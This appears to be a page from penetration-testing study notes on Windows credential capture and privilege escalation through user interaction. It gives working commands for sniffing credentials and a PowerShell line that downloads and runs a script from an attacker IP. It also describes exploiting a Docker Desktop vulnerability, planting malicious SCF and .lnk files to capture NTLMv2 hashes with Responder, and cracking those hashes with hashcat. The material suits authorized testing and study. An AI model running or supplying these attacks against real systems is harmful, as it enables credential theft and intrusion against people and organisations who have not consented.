23.Interacting-with-users

Traffic Capture

# Wireshark (GUI)
# tcpdump (replace <interface>)
tcpdump -i <interface>
# net-creds (replace <interface> or <pcap_file>)
net-creds -i <interface>
net-creds -f <pcap_file>

Process Command Lines

# PowerShell (on target)
powershell IEX (iwr 'http://10.10.10.205/procmon.ps1')

SCF on File Share

# (Create @Inventory.scf with appropriate content)
# Responder (replace <interface>)
sudo responder -wrf -v -I <interface>

Cracking NTLMv2 Hash

# Hashcat (replace <hash_file> and <wordlist>)
hashcat -m 5600 <hash_file> <wordlist>

Malicious .lnk File (PowerShell)

# (Replace <attackerIP> in the script)
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\legit.lnk")
$lnk.TargetPath = "\\<attackerIP>\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

1. Traffic Capture

  • Wireshark:

    • Utilize Wireshark (if installed) to capture network traffic.

    • Analyze captured traffic for cleartext credentials (e.g., FTP).

  • tcpdump/Wireshark (on attack machine):

    • Capture network traffic on the attack machine using tcpdump or Wireshark.

  • net-creds:

    • Use net-creds to sniff passwords and hashes from a live interface or pcap file.

2. Process Command Lines

  • Monitor process command lines:

    • Use the provided PowerShell script to monitor process command lines for potentially exposed credentials.

  • Execute monitoring script on target:

    • Host the script on the attack machine (e.g., http://10.10.10.205/procmon.ps1).

    • Execute on the target using: powershell IEX (iwr 'http://10.10.10.205/procmon.ps1')

3. Vulnerable Services

  • CVE-2019-15752 (Docker Desktop):

    • Exploit the vulnerability by placing a malicious executable in C:\PROGRAMDATA\DockerDesktop\version-bin\.

    • Wait for the Docker application to restart or a user to execute docker login.

4. SCF on a File Share

  • Create a malicious SCF file (e.g., @Inventory.scf):

    • Use the provided SCF file content, replacing the attacker IP and share details.

  • Start Responder:

    • sudo responder -wrf -v -I tun0 (replace tun0 with your interface)

  • Wait for user interaction:

    • Monitor Responder for captured NTLMv2 hashes.

5. Cracking NTLMv2 Hash

  • Use Hashcat:

    • hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt (replace hash and wordlist path)

6. Capturing Hashes with Malicious .lnk File

  • Generate a malicious .lnk file:

    • Use the provided PowerShell script, replacing the attacker IP.

  • Place the .lnk file on a share or target machine.

  • Start Responder and monitor for captured hashes.

Previous7.Additional TechniquesNext24.Pillaging

Last updated